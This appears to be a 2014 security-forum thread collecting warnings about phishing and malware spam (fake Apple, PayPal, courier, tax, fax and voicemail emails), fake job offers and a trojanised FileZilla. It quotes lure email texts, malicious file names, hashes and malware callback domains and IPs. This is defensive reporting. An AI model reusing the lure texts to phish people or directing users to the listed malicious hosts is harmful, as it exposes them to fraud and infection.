Jan 21, 2014 - "Email purporting to be from Apple claims that the user's online access has been blocked because customers are required to update their information in order to use new ssl servers... The email is not from Apple. It is a phishing scam designed to trick recipients into giving their Apple account details and other personal and financial information to Internet criminals.
> http://www.hoax-slayer.com/images/apple-ssl-servers-scam-1.jpg
... According to an email that -appears- to come from Apple, the recipient's Apple account has been blocked until account information is updated. The email claims that Apple is implementing new SSL servers to increase customer protection and therefore all customers need to update their details or risk suspension of their accounts. The email includes a link to the "account update process". However, the message is -not- from Apple and the claim that users must update their details is a lie. Instead, the email is a phishing scam designed to steal Apple IDs and a large amount of other personal and financial information. Those who fall for the trick and click the update link in the email will be taken to a fake Apple login page as shown in the following screenshot:
> http://www.hoax-slayer.com/images/apple-ssl-servers-scam-3.jpg
... be wary of any message purporting to be from Apple that claims there is an issue with your account that needs to be rectified or you are required to perform an account update..."

... as in: DELETE.
___

Data-stealing malware targets Mac users in "undelivered courier item" attack
- http://nakedsecurity.sophos.com/2014/01/21/data-stealing-malware-targets-mac-users-in-undelivered-courier-item-attack/
Jan 21, 2014 - "... you receive an email that claims to be a courier company that is having trouble delivering your article. In the email is a link to, or an attachment containing, what purports to be a tracking note for the item. You are invited to review the relevant document and respond so that delivery can be completed. We've seen a wide variety of courier brands "borrowed" for this purpose, including DHL, the UK's Royal Mail and even, in one bewildering case, a made-up courier company called TNS24, with its very own website... Here's what the emails looked like in this attack, with some details changed or redacted for safety:
> http://sophosnews.files.wordpress.com/2014/01/osx-fed-email-500.png?w=500&h=446
If you are a native speaker of English, you will notice that the wording of the email is clumsy and unidiomatic, and if you were to receive a message like this you might well be suspicious on those grounds alone... The link, of course, doesn't really lead to fedex .com .ch, but instead takes you to a domain name that is controlled by the attackers... If you are using a desktop browser that isn't Safari, you receive a ZIP file containing a Windows program detected by Sophos Anti-Virus as Mal/VBCheMan-C, a vague relative of the Zbot or Zeus malware. But if you are using Safari, you receive Mac malware, delivered as an Application bundle packaged inside a ZIP file. By default, on OS X 10.9.1 (the latest update to Mavericks, Apple's most recent operating system version), Safari directly downloads the file, showing you an -empty- Safari window with the icon of the downloaded file in the Dock at the bottom of the screen:
> http://sophosnews.files.wordpress.com/2014/01/osx-fed-pdf-appears-500.png?w=500&h=376
Clicking on the download button shows you what -looks- like a PDF file... There is no PDF file, as a visit to the Terminal window quickly reveals. Safari has automatically unzipped the download, producing an Application bundle (actually just a subdirectory tree with a special structure) that has deliberately been given a PDF icon... the temptation is to click on what looks like a PDF file to see what it contains. OS X does try to advise you that you aren't opening a document, although you can argue that the warning would be more compelling if it explicitly said that you were about to "run a software program", rather than merely to "open" the file... prevention is better than cure. And that "undelivered courier item" almost certainly doesn't exist."
___

Something evil on 5.254.96.240 and 185.5.55.75
- http://blog.dynamoo.com/2014/01/something-evil-on-525496240-and-18555575.html
21 Jan 2014 - "This malware attack appears to be aimed at German speakers, and is presumably spreading through spam although I don't have a sample of the email message. What I -do- have is a nasty EXE-in-ZIP payload that masquerades as a bill or other communication from Deutsche Telekom, Vodafone, Fiducia or Volksbank. URLquery shows one such download in this example*, the victim has been directed to [donotclick]gf-58 .ru/telekom_deutschland which in turn downloads a ZIP file Rechnungsruckstande_9698169830015295.zip which in turn contains a malicious executable Mitteilung, Rechnungsruckstande 9901169820005294 Telekom Deutschland GmbH vom Januar 2014.exe which has a VirusTotal detection rate of 7/48**.
> https://lh3.ggpht.com/-icNtor0_pdM/Ut6DaRXAgGI/AAAAAAAACb4/XqfuRAlLjFU/s1600/telekom.png
The malware is downloaded from a server at 5.254.96.240 (Voxility, Romania). Sample URLs on this server according to URLquery*** and VirusTotal****... The Anubis report and ThreatExpert report show that the malware calls home to dshfyyst .ru on 185.5.55.75 (UAB "Interneto vizija", Lithuania). There are some other suspect sites on the same server which may be worth blocking (see below). All these sites are .ru domains registered to the infamous "Private Person" so there are no clues as to their ownership.
Recommended blocklist: ..."
(Full blocklist of IPs and domains at the dynamoo URL above.)

* http://urlquery.net/report.php?id=8907792

** https://www.virustotal.com/en-gb/file/9ff1c4c75212defc5fadc096cb8436dc9eaabb3afe0e69364ce53e90dadbfabc/analysis/1390310958/

*** http://urlquery.net/search.php?q=5.254.96.240&type=string&start=2014-01-06&end=2014-01-21&max=50

**** https://www.virustotal.com/en-gb/ip-address/5.254.96.240/information/

Update: this appears to be Cridex aka Feodo: http://www.abuse.ch/?p=6713

:mad: :fear:

AplusWebMaster
2014-01-22, 15:47
FYI...

Fake PayPal Scams ...
- http://www.hoax-slayer.com/look-out-for-paypal-scam-warning-message.shtml
Jan 22, 2014 - "Message that circulates via social media and online forums warns users to watch out for an email from PayPal... PayPal is almost continually targeted by phishing scammers using a wide variety of phishing techniques... This warning message has been circulating via various social media channels as well as online forums and blogs since around May 2013. The message warns users to look out for an email from PayPal that claims that £35.50 has been taken from the recipient's PayPal account and used to pay a Skype bill... Since at least 2011 scammers have been using and reusing a phishing technique that comprises scam emails that supposedly notify recipients that a Skype TopUp payment has been made via their PayPal account. Links in the scam emails open -fake- PayPal sites that entice users to enter their PayPal login details, and - in some cases - other personal and financial information... it should also be noted that this particular phishing technique is just one among -dozens- of phishing attacks that continually target PayPal users... Because it conducts its business online and via email, PayPal is a primary target for phishing scammers. A quick rule of thumb. Genuine PayPal emails will always address you by your name, -not- via a generic greeting such as "Dear Customer". If you receive a suspected phishing scam email from PayPal you can submit it for analysis via the address listed on the PayPal website*."
* https://www.paypal.com/au/webapps/mpp/security/antiphishing-ppphishingreport
___

Sochi Olympics - Hoax threats
- http://www.reuters.com/article/2014/01/22/olympics-threat-idUSL5N0KW3RT20140122
Jan 22, 2014 - "At least five European countries' Olympic committees and the United States received letters in Russian on Wednesday making a "terrorist threat" before the Sochi Games, but Olympic chiefs said they posed no danger. Despite the assurances, the letters to committees in Italy, Hungary, Germany, Slovenia and Slovakia briefly caused alarm and underlined nervousness about security at the $50 billion event... The U.S. Olympic Committee later confirmed that it also received a letter by email. Suicide bombers killed at least 34 people in a city in southern Russia last month, Islamist militants have threatened to attack the Winter Games and security forces are hunting a woman suspected of planning a suicide bombing and of being in Sochi already..."
___

Facebook Survey Scams
- http://www.hoax-slayer.com/facebook-survey-scam-list.shtml
Jan 21, 2014 - Last:
- http://www.hoax-slayer.com/royal-caribbean-international-survey-scam.shtml
Jan 22, 2014
___

Fake NatWest Mortgage Spam
- http://threattrack.tumblr.com/post/74170286889/natwest-mortgage-spam
Jan 22, 2014 - "Subjects Seen:
Mortgage update - Completion date
Typical e-mail details:
NatWest Intermediary Solutions
Mortgage Ref number: 9080338
We are pleased to advise that we have received a mortgage completion request from the solicitor acting on the case for your customer named above. The acting solicitor has confirmed that the mortgage will complete on 22.01.2014.
For more details please check attached file.
Kind Regards
NatWest Mortgage Team

Malicious File Name and MD5:
Morg_9080338.zip (C02B5FA63331394B6ADFF54952646A16)
Morg_220114.exe (BE295E5E51F2354EF6396AFAB4225783)

Screenshot: https://31.media.tumblr.com/943447252d5a4ba04b541425281a7959/tumblr_inline_mzt3y3xdNK1r6pupn.png

Tagged: NatWest, Upatre
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Email Messages with Malicious Attachments - 2014 Jan 22
Fake Account Payment Notification Email Messages - 2014 Jan 22
Fake Application Confirmation Email Messages - 2014 Jan 22
Fake Transaction Details Notification Email Messages - 2014 Jan 22
Fake Electricity Bill Notification Email Messages - 2014 Jan 22
Fake Court Appearance Request Email Messages - 2014 Jan 22
Fake Product Order Notification Email Messages - 2014 Jan 22
Fake Travel Information Email Messages - 2014 Jan 22
Fake Product Order Email Messages - 2014 Jan 22
Fake UPS Payment Document Attachment Email Messages - 2014 Jan 22
Fake Photograph Sharing Email Messages - 2014 Jan 22
Fake Court Appearance Request Email Messages - 2014 Jan 22
Fake Account Payment Information Email Messages - 2014 Jan 22
Fake Failed Delivery Notification Email Messages - 2014 Jan 22
Fake Company Complaint Email Messages - 2014 Jan 22
Fake Fax Message Delivery Email Messages - 2014 Jan 22
Fake Fax Delivery Email Messages - 2014 Jan 22
Fake Payroll Invoice Email Messages - 2014 Jan 22
Malicious Personal Pictures Attachment Email Messages - 2014 Jan 22
Fake German Payment Form Attachment Email Messages - 2014 Jan 22
(More detail and links at the cisco URL above.)

:fear: :mad:

AplusWebMaster
2014-01-23, 16:11
FYI...

Fake "Legal Business Proposal" SPAM ...
- http://blog.dynamoo.com/2014/01/legal-business-proposal-spam-has.html
23 Jan 2014 - "This email looks like it should be an advanced fee fraud, but instead it comes with a malicious attachment. I love the fact that this is a Legal Business Proposal as opposed to an Illegal one.
Date: Thu, 23 Jan 2014 12:45:11 +0000 [07:45:11 EST]
From: Webster Bank [WebsterWeb-LinkNotifications@ WebsterBank .com]
Subject: Legal Business Proposal
Hello, I'm Norman Chan Tak-Lam, S.B.S., J.P, Chief Executive, Hong Kong Monetary Authority (HKMA).
I have a Business worth $47.1M USD for you to handle with me.
Detailed scheme of business can be seen in the attached file.

Attached is a file business-info.zip which in turn contains a malicious executable business-info.exe with a VirusTotal detection rate of 16/49*. Automated analysis tools... show attempted connections to dallasautoinsurance1 .com on 38.102.226.239 and wiwab .com on 38.102.226.82. Both those IPs are Cogent Communications ones that appear to be rented out to a small web hosting firm called HostTheName .com. For information only, that host has these other IPs in the same range:
..."
(Full IP list at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/61e951a6d18f96539bf7ad19cf951c9d397e6b45b905adf431f7981a54b59be4/analysis/1390482190/

- https://www.virustotal.com/en/ip-address/38.102.226.82/information/
___

Mint.Com.Uk 'Minimum Credit Card Payment Due' Phish
- http://www.hoax-slayer.com/mint-credit-card-payment-due-phishing.shtml
Jan 23, 2014 - "Message, which pretends to be from UK based credit card provider Mint, claims that the recipient's minimum credit card payment is due and advises that the latest bill can be found in an attached file. The email is -not- from Mint. It is a -phishing- scam designed to trick recipients into divulging their account login details to cybercriminals... According to this message, which purports to be from UK credit card provider Mint, the recipient's minimum credit card payment is now due. The message instructs the recipient to open an attached file to view the latest Mint credit card bill. However, the email is not from Mint and the attachment does not contain a credit card bill. Instead, the email is a typical phishing scam designed to trick Mint customers into giving account login details to cybercriminals. Those taken in by the email will find that clicking the attachment loads a html file in their browser. The file contains a link supposedly leading to the credit card bill. However, clicking the link opens a fraudulent website that asks users to supply their account login details, ostensibly to access the "bill". However, users will never reach the supposed bill. They have instead sent their account login details to criminals who can then use it to hijack their accounts, steal information therein, and conduct further fraud..."
___

Gateway.gov.uk Spam
- http://threattrack.tumblr.com/post/74280913157/gateway-gov-uk-spam
Jan 23, 2014 - "Subjects Seen:
Your Online Submission for Reference 435/GB1678208 Could not process
Typical e-mail details:
The submission for reference 435/GB1678208 was successfully received and was not processed.
Check attached copy for more information.

Malicious File Name and MD5:
GB1678208.zip (1BD4797C93A4837777397CE9CB13FC8C)
GB001231401.exe (05FB8AD05E87E12F5E6E4DAE20168194)

Screenshot: https://31.media.tumblr.com/efe7c609820416483d66a4d348eababb/tumblr_inline_mzv11lghEd1r6pupn.png

Tagged: UK Government, Upatre

:fear: :mad:

AplusWebMaster
2014-01-24, 15:01
FYI...

Fake 'Customer Service Center' malware Emails
- http://www.hoax-slayer.com/customer-service-center-malware-emails.shtml
Jan 24, 2014 - "Email claiming to be from the "Customer Service Center" informs recipients that an order has been received and invites them to click a link to find out more about the order.
Brief Analysis: The email is not from any legitimate customer service center. The email is designed to trick users into installing a malicious file on their computer. Clicking the link in the email downloads a .zip file that contains a malware .exe file...
Example:
Subject: Customer Service Center
Hello, Customer
We have got your order and we will process it for 3 days.
You can find specification of the order:
[Link to .zip file removed]
Best regards
Customer Service Center

... The message makes no effort to identify either the company that supposedly sent the message or the product that the recipient supposedly ordered. The message is fraudulent and was not sent by any legitimate customer service center. The goal of the criminals who sent the email is to trick the recipient into downloading and installing malware... Details in different incarnations of the malware emails may vary. Some may claim to be from the "Client Management Department" rather than the "Customer Service Center"..."
___

Fake Amazon Local Spam
- http://threattrack.tumblr.com/post/74407933494/amazon-local-spam
Jan 24, 2014 - "Subjects Seen:
Fwd: Your order report id 2531
Typical e-mail details:
Hi,
Thank you for your order. We ll let you know once your item(s) have dispatched.You can check the status of your order or make changes to it by visiting Your Orders on Amazon.com.
Order Details
Order DA6220062 Placed on December 11, 2013
Order details and invoice in attached file.

Malicious File Name and MD5:
report.creditcard2735.zip (333794D9592CE296A6FE15CDF58756EA)
report.9983.exe (3B81614E62963AC5336946B87F9487FE)

Screenshot: https://31.media.tumblr.com/747295f5d77e9ee97623058f2135eeec/tumblr_inline_mzx8bt1SLW1r6pupn.png

Tagged: Amazon Local, Androm

:fear: :mad:

AplusWebMaster
2014-01-25, 12:51
FYI...

Fake "MVL Company" job offer
- http://blog.dynamoo.com/2014/01/mvl-company-fake-job-offer.html
25 Jan 2014 - "This job offer is a -fake- and in reality probably involves money laundering or handling stolen goods:
From: Downard Bergstrom [downardkrjbergstrom@ outlook .com]
Subject: Longmore
Date: Fri, 24 Jan 2014 18:52:49 +0000
Hello,
Today our Company, MVL Company, is in need of sales representatives in United Kingdom.
Our Company deals with designer goods and branded items. We've been providing our customers with exclusive products for more than five years, and we believe that the applicant for the position must have great communication skills, motivation, desire to earn money and will to go up the ladder. All charges related to this opening are covered by the Company. Your main duties include administrative support on orders and correspondence, controlling purchase orders and expense reports.
Part-time job salary constitutes 460GBP a week.
Full-time job is up to 750GBP per week .
Plus we have bonus system for the best workers!
To apply for the vacancy or to get more details about it, please email us directly back to this email.
Hope to hear from you soon!
Best regards,
Downard Bergstrom

The spam is somewhat unusual in that it addresses me by my surname, indicating that the email data might have been stolen from a data breach (Adobe perhaps). The email originates from a free Microsoft Outlook .com account and gives no clues as to its real origins. A look at Companies House Webcheck confirms that there is no company of this exact name, although there are several innocent companies with similar names.
Avoid."

:fear: :mad:

AplusWebMaster
2014-01-27, 14:18
FYI...

Fake Voice Message contains trojan in attachment
- http://blog.mxlab.eu/2014/01/27/voice-message-from-unknown-xxx-xxx-xxxx-contains-trojan-in-attached-zip-file/
Jan 27, 2014 - "... intercepted a new trojan distribution campaign by email with the subject Voice Message from Unknown (xxx-xxx-xxxx) – where x is replaced by a phone number. This email is sent from the spoofed address “Unity Messaging System <Unity_UNITY5@ xxx .xxx>” and has the following very short body (where x is replaced by phone number):
From: xxx-xxx-xxxx
The attached ZIP file has the name VoiceMail.zip and contains the 18 kB large file VoiceMail.exe. At the time of writing, 0 of the 50 AV engines did detect the trojan at Virus Total. Use the Virus Total* permalink and Malwr** permalink for more detailed information..."
* https://www.virustotal.com/en/file/e4f11d9a6515323165e2427fe0032bf29ee6ae7a0144b79f7f9dba64df8a6fba/analysis/

** https://malwr.com/analysis/ZjU0NzBlZDFjNTZkNDQ5MmIyYjUyMzFjMGMxOTBkMmM/
___

Fake "Carnival Cruise Line Australia" job offer
- http://blog.dynamoo.com/2014/01/carnival-cruise-line-australia-fake-job.html
27 Jan 2014 - "This -fake- job offer does NOT come from Carnival Cruise lines:
From: Mrs Vivian Mrs Vivian carnjob80@ wp .pl
Date: 27 January 2014 09:59
Subject: JOB ID: AU/CCL/AMPM/359/14-00
Signed by: wp.pl
Carnival Cruise Line Australia
15 Mount Street North Sydney
NSW 2060, Australia
Tel (2) 8424 88000
http ://www .carnival .com .au/
http ://www .carnivalaustralia .com/
carnivalcareer@ globomail .com
JOB ID: AU/CCL/AMPM/359/14-00
What is your idea of a great career? Is it a job that allows you to travel to beautiful destinations on a spectacular floating resort, being part of a multi-cultural team with co-workers from more than 120 different nationalities? Or is it a job that allows you to earn great money while you learn, grow and fulfill your dreams and career ambitions?
It’s Carnival Cruise Line policy not to discriminate against any employee or applicant for employment because of RACE, COLOR, RELIGION, SEX, NATIONAL ORIGIN, AGE, DISABILITY, MARITAL OR VETERAN STATUS.
PLEASE NOTE THESE FOLLOWING:
Employment Type: Full-Time/Part-Time
Salary: USD $45,000/ USD $125,000 per annual
Preferred Language of Resume/Application: English
Type of work: Permanent / Temporary
Status: All Vacancies
Job Location: Australia
Contract Period: 6 Months, 1 Year, 2 Years and 3 Years
Visa Type: Three Years working permit
The management will secure a visa/working permit for any qualified applicant. VISA FEE, ACCOMMODATION & FLIGHT TICKET will be paid by the company
We have more than 320 different positions available, interested applicants should forward their RESUME/CV or application letter to Mrs Vivian Oshea via email on (carnivalcareer@ globomail .com) so we can forward the list of positions available and our employment application form
Email: carnivalcareer@ globomail .com
Note: Applicants from AMERICA, EUROPE, ASIAN, CARIBBEAN and AFRICA can apply for these vacancies.
Regards
Management
Carnival Cruise Line Australia
carnivalcareer@ globomail .com

Despite the appearance of Carnival's actual web sites in the email, the reply address is NOT a genuine Carnival address and is instead a free email account. The email actually originates from 212.77.101.7 in Poland. The basic idea behind this scam is to offer a job and then charge the applicant for some sort of processing fees or police check or come up with some other reason why the applicant needs to pay money. Once the money has been taken (and perhaps even the victim's passport or other personal documents stolen) then the job offer will evaporate. More information on this type of scam can be found here* and here**."
* http://www.cruiseshipjobs.com/cruise-ship-job-scams.htm

** http://www.hoax-slayer.com/disney-cruise-line-job-offer-scam.shtml
___

Fake "Your FED TAX payment" SPAM
- http://blog.dynamoo.com/2014/01/your-fed-tax-payment-spam.html
27 Jan 2014 - "This -fake- "Tax payment" spam comes with a malicious attachment:
Date: Mon, 27 Jan 2014 14:24:42 +0100 [08:24:42 EST]
From: "TaxPro_PTIN@ irs .gov" [TaxPro_PTIN@ irs .gov]
Subject: Your FED TAX payment ( ID : 34KIRS821217111 ) was Rejected
*** PLEASE DO NOT RESPOND TO THIS EMAIL ***
Your federal Tax payment (ID: 34KIRS821217111), recently sent from your checking account was returned by the your financial institution.
For more information, please download notification, using your security PIN 55178.
Transaction Number: 34KIRS821217111
Payment Amount: $ 9712.00
Transaction status: Rejected
ACH Trace Number: 768339074172506
Transaction Type: ACH Debit Payment-DDA
Internal Revenue Service, Metro Plex 1, 8401 Corporate Drive, Suite 300, Landover, MD 20785.

Screenshot: https://lh3.ggpht.com/-UNIXkf1KrEo/UuZ_8WP-v1I/AAAAAAAACc8/ObemHBUxulA/s1600/irs.png

Attached is a file Tax payment.zip which in turn contains a malicious executable Tax payment.exe which has a VirusTotal detection rate of 11/50*. Automated analysis by Malwr is inconclusive, other analysis tools are currently down or under DDOS at the moment.
* https://www.virustotal.com/en-gb/file/97a5412374a70610c9ed83eb4e202b0e8653384c3c8372bc63137c3a14e8fe0b/analysis/1390837447/
___

TNT Courier Service Spam
- http://threattrack.tumblr.com/post/74723096757/tnt-courier-service-spam
Jan 27, 2014 - "Subjects Seen:
TNT UK Limited - Package tracking 525933498011
Typical e-mail details:
TNT COURIER SERVICE (TCS)
Customer/Delivery Services Department
Central Pk Est/Mosley Rd, Trafford Park
Manchester, M17 1TT UK.
DETAILS OF PACKAGE
Reg order no: 525933498011
Your package have been picked up and is ready for dispatch.
Connote # : 525933498011
Service Type : Export Non Documents - Intl
Shipped on : 25 Jan 13 00:00
Order No : 4134172
Status : Driver’s Return Description : Wrong Address
Service Options: You are required to select a service option below.
The options, together with their associated conditions

Malicious File Name and MD5:
Label_525933498011.zip (58985CC9AA284309262F4E59BC36E47A)
Label_27012014.exe (E0595C4F17056E5599B89F1F9CF52D83)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/9745ecae0aa5ea25ce90ec5df697f5d4/tumblr_inline_n02cy8Jn4u1r6pupn.png

Tagged: TNT Courier Service, Upatre
___

Fake "Skype Missed voice message" SPAM
- http://blog.dynamoo.com/2014/01/skype-missed-voice-message-spam.html
27 Jan 2014 - "This -fake- Skype email has a malicious attachment:
Date: Mon, 27 Jan 2014 19:37:11 +0300 [11:37:11 EST]
From: Administrator [docs1@ victimdomain .com]
Subject: Skype Missed voice message
Skype system:
You have received a voice mail message.
Date 01/27/2014
Message length is 00:01:18.

Attached to the email message is an archive file Skype-message.zip which in turn contains a malicious executable Voice_Mail_Message.exe which has a VirusTotal detection rate of 13/49*. Malwr reports** that the malware calls home to rockthecasbah .eu on 64.50.166.122 (LunarPages, US). This server has been compromised before and I recommend you -block- traffic to it."
* https://www.virustotal.com/en/file/ba438b657c3a0efa1af1cdb7ae901a9e7778b949e91ae4460f3c97a36ae49836/analysis/1390858228/

** https://malwr.com/analysis/MzY1NTdiODY5M2MwNDcxZWEwMzdjZmYwMWM1NzIwMDg/

- http://threattrack.tumblr.com/post/74739263432/skype-missed-message-spam
Jan 27, 2014 - "Subjects Seen: Skype Missed voice message..."
Malicious File Name and MD5:
Skype-message.zip (79FB2E523FE515A6DAC229B236F796FF)
Voice_Mail_Message.exe (6E4857C995699C58D9E7B97BFF6E3EE6)

Tagged: Skype, Upatre

:fear::fear: :mad:

AplusWebMaster
2014-01-28, 12:25
FYI...

Fake Facebook 'Account Verification' Scam/SPAM
- http://www.hoax-slayer.com/facebook-account-verification-2014-scam.shtml
Jan 28, 2014 - "Message purporting to be from the "Facebook Verification Team" claims that users must verify their profiles by March 15th 2014 to comply with the SOPA and PIPA Act. The message is a -scam- and -not- from any official Facebook Verification Team. Those who follow the link will be tricked into installing a rogue Facebook app and participating in -bogus- online surveys. Some variants may attempt to trick users into divulging their Facebook email address and password to criminals. Example:
Warning: Announcement from Facebook Verification Team:
All profiles must be verified before 15th March 2014 to
avoid scams under SOPA and PIPA Act.
Verify your Account by steps below
Invite your friends.
> http://www.hoax-slayer.com/images/facebook-account-verfication-2014-1.jpg
According to a message currently moving round Facebook, all users must verify their profiles by March 15th 2014 in order to comply with the SOPA and PIPA Act. The message, which comes in the form of a graphic, claims to be an announcement from the "Facebook Verification Team". Users are instructed to click an "Invite your Friends" button to begin the verification process... Users who fall for the ruse and click the button will first be asked to give a Facebook application permission to access their details. Once installed, this rogue app will spam out more fake messages in the name of the user. Victims will then be taken to another fake page where they are again told that they must verify their account by clicking a further link. However, clicking the link takes them to various survey pages or tries to entice them to sign up for online games. Many of the surveys claim that users must provide their mobile phone number to enter in a prize draw. But, by giving out their number, users are actually signing up for very expensive SMS "subscriptions" charged at several dollars per message sent. Other surveys may ask victims to provide personal and contact information that will later be shared with third parties and used to inundate them with junk mail, emails, phone calls and text messages. The scammers responsible for the bogus "verification" messages will earn commissions via dodgy affiliate marketing systems each and every time a person participates in a survey or provides their personal information in an online "offer". Reports indicate that some versions of the scam may try to trick victims into divulging their account login details to criminals. The criminals can then -hijack- the compromised accounts and use them to distribute further scam messages..."
___

Fake RingCentral Fax msg SPAM
- http://blog.dynamoo.com/2014/01/this-fake-ringcentral-fax-spam-has.html
28 Jan 2014 - "This -fake- RingCentral fax spam has a malicious attachment:
Date: Tue, 28 Jan 2014 14:28:24 +0000 [09:28:24 EST]
From: Sheila Wise [client@ financesup .ru]
Subject: New Fax Message on 01/22/2013
You Have a New Fax Message
From: (691) 770-2954
Received: Wednesday, January 22, 2014 at 11:31 AM
Pages: 5
To view this message, please open the attachment
Thank you for using RingCentral.

Screenshot: https://lh3.ggpht.com/-96SG-7HQH2o/UufLIJSx1-I/AAAAAAAACdo/r6-QzTUmUtM/s1600/ringcentral.png

Attached is a file fax.zip which in turn contains a malicious executable fax.doc.exe with an icon to make it look like a Word document. The VirusTotal detection rate for the document is 10/50*, and the Malwr analysis** shows an attempted callback to ren7oaks .co .uk on 91.238.164.2 (Enix Ltd, UK). The executable then downloads an apparently encrypted file..."
* https://www.virustotal.com/en-gb/file/4a26797889d35d056272de85253874ebbf389fad3b6a1b4a44dad0198580920f/analysis/1390921856/

** https://malwr.com/analysis/NTIxYTE4ZTFhZmU4NGExZWFhYjA5OWFhZmUyYzlmOTQ/
___

Fake flash update via .js injection and SkyDrive
- http://blog.dynamoo.com/2014/01/ongoing-fake-flash-update-via-js.html
28 Jan 2014 - "... ongoing injection attacks that were leading to Adscend Media LLC ads. Adscend say that the affiliate using their ad system was banned, although the ad code is -still- showing in the injection attacks themselves. F-Secure also covered the attacks* from a different aspect... this infection is -still- current..."
(More detail at the dynamoo URL above.)

* http://www.f-secure.com/weblog/archives/00002659.html

> http://www.f-secure.com/weblog/archives/5_flash1.PNG
___

Fake Flash Update aimed at Turkish users
- http://blog.trendmicro.com/trendlabs-security-intelligence/fake-adobe-flash-update-aimed-at-turkish-users/
Jan 27, 2014 - "... A recent attack that we found starts off with a video link sent to users via Facebook’s messaging system (sent in Turkish). This “video” prompts users to install a Flash Player update; it actually installs a browser extension that blocks access to various antivirus sites. It also sends a link to the “video” to the victim’s Facebook friends via the messaging system, restarting the cycle. This targeting appears to have worked: based on feedback from the Smart Protection Network, 93% of those who accessed pages related to this attack were from Turkey. The browser extension pushed to users was in the format used by Chromium-based browsers like Google Chrome. It would -not- work in other browsers, like Internet Explorer and Mozilla Firefox. It also stops the user from accessing the extension settings page, to prevent the user from removing or disabling the extension.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/01/turkishflashplayer.jpg
... The fake update, detected as TROJ_BLOCKER.J, installs the extension (detected as JS_BLOCKER.J) that blocks the antivirus websites. JS_BLOCKER.J then downloads a malicious script which is used to send the Facebook messages with the link to the video. This script is detected as HTML_BLOCKER.K. In addition to Facebook messages, Twitter accounts “promoting” this page were also spotted:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/01/turkishtwitteraccountupdated.jpg
Turkey is one of the world’s most active Facebook-using countries, with 19 million daily active users and 33 million monthly active users... this attack’s behavior – blocking antivirus sites – ... would leave them vulnerable to future attacks..."
___

Malformed FileZilla - login stealer
- http://blog.avast.com/2014/01/27/malformed-filezilla-ftp-client-with-login-stealer/
Jan 27, 2014 - "Beware of malformed FileZilla FTP client versions 3.7.3 and 3.5.3. We have noticed an increased presence of these malware versions of famous open source FTP clients. The first suspicious signs are bogus download URLs. As you can see, the installer is mostly hosted on -hacked- websites with -fake- content (for example, texts and user comments are represented by images).
> https://blog.avast.com/wp-content/uploads/2014/01/web_01.jpg
Malware installer GUI is almost identical to the official version. The only slight difference is the version of the NullSoft installer, where the malware uses 2.46.3-Unicode and the official installer uses v2.45-Unicode. All other elements like texts, buttons, icons and images are the same. The installed malware FTP client looks like the official version and it is fully functional! You can’t find any suspicious behavior, entries in the system registry, communication or changes in the application GUI.
The only differences that can be seen at first glance are the smaller file size of filezilla.exe (~6,8 MB), 2 dll libraries libgcc_s_dw2-1.dll and libstdc++-6.dll (not included in the official version) and information in the “About FileZilla” window indicating the use of older SQLite/GnuTLS versions. Any attempt to update the application fails, which is most likely a protection to prevent overwriting of malware binaries.
> https://blog.avast.com/wp-content/uploads/2014/01/about_windows.jpg
We found a hardcoded connection detail stealer after deeper analysis. Malware authors abuse open source code and add their own stealer function to the main code... The algorithm is part of the malformed FileZilla.exe binary, therefore sending stolen login details bypasses the firewall. The whole operation is very quick and quiet. Login details are sent to attackers from the ongoing FTP connection only once. Malware doesn’t search bookmarks or send any other files or saved connections... Malware authors use very powerful and inconspicuous methods to steal FTP login credentials in this case... We -strongly- recommend downloading any software only from official, well-known or trusted sources. Avoid strange looking websites and portals offering software via their own downloaders or installers containing bundled adware and PUP applications..."

:fear: :mad:

AplusWebMaster
2014-01-29, 18:04
FYI...

Fake "Voice Message" SPAM (again)
- http://blog.dynamoo.com/2014/01/voice-message-from-unknown-spam-again.html
29 Jan 2014 - "This -fake- voice message spam comes with a malicious attachment:
Date: Wed, 29 Jan 2014 14:45:36 +0100 [08:45:36 EST]
From: Administrator [docs0@ victimdomain .net]
Subject: Voice Message from Unknown (644-999-4348)
Unity Messaging System
- - -Original Message- - -
From: 644-999-4348
Sent: Wed, 29 Jan 2014 14:45:36 +0100
To: [redacted]
Subject: Important Message to All Employees

Attached is an archive Message.zip which in turn contains a malicious executable VoiceMessage.exe which has a VirusTotal detection rate of just 6/50*. Automated analysis tools... show attempted connections to kitchenrescue .com on 184.107.74.34 (iWeb, Canada) and ask-migration .com on 173.192.21.195 (Softlayer, US). In particular, it attempts to download some sort of -encrypted- file [donotclick]kitchenrescue .com/login.kitchenrescue.com/images/items/wav.enc which I have not been able to identify."
* https://www.virustotal.com/en/file/d28477812ad468a2965e8962b876f410a1b52074bc22b0122d22ab69950b720c/analysis/1391006188/

- https://www.virustotal.com/en/ip-address/184.107.74.34/information/

- https://www.virustotal.com/en/ip-address/173.192.21.195/information/
___

Neutrino delivers Fake Flash malware hosted on SkyDrive
- http://blog.malwarebytes.org/online-security/2014/01/neutrino-delivers-fake-flash-malware-hosted-on-skydrive/
Jan 29, 2014 - "As cloud computing becomes more popular, malware authors are also taking interest in using this technology to store their own files—except, of course, their files are usually bad. SkyDrive (recently renamed to OneDrive) is Microsoft’s cloud storage solution, and competes directly with other big-name storage products like Google Drive and Dropbox, all of which provide a convenient solution to accessing your files from virtually any location with internet access. Recently, I found a downloader collected from our honeypot that appears as a -fake- Flash Player installer. These types of programs usually deliver malware and are very successful at making people believe they’re installing or updating the real Flash Player. This particular downloader file currently is detected by 9/50 vendors on Virustotal* ... The downloader binary was a payload from the Neutrino Exploit Kit and delivered via a Java exploit... When the file runs, it beacons out to the SkyDrive URL and presents a dialog that states it’s installing Flash Player, and then says “Installation Finished!” if everything goes well.
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/01/flash_install_finished.jpg
I visited the download server multiple times and managed to get different samples, each with their own icon (including a creepy skull). Meaning the samples stored on the SkyDrive folder are constantly being updated.
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/01/flashplayer_samples.png
... To be fair to Microsoft, this isn’t the only instance where cloud storage was used for bad things. Last November, we reported on a malicious script that was hosted on Google Drive, and similar things have happened with Dropbox. Regardless, it appears more security measures need to be put into place to prevent various malicious files and programs from being uploaded to cloud storage services."
* https://www.virustotal.com/en/file/2e049271a6546113e9500a3db07ecd435ba9b4b61857a7fd04909232c9135be8/analysis/
___

Fake Browser updates ...
